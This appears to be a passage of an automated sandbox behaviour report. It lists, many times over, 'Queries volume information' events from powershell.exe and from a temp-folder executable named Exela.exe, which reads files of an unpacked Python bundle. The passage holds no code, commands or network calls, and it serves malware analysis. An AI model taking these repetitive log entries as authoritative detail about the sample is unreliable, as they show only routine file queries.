                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp\_websocket VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\attrs-24.3.0.dist-info VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\attrs-24.3.0.dist-info VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\attrs-24.3.0.dist-info VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\attrs-24.3.0.dist-info VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography-44.0.0.dist-info VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography-44.0.0.dist-info VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography-44.0.0.dist-info VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography-44.0.0.dist-info VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography-44.0.0.dist-info VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography-44.0.0.dist-info\licenses VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\cryptography-44.0.0.dist-info VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\base_library.zip VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\_ctypes.pyd VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882 VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Exela.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI70882\aiohttp VolumeInformation
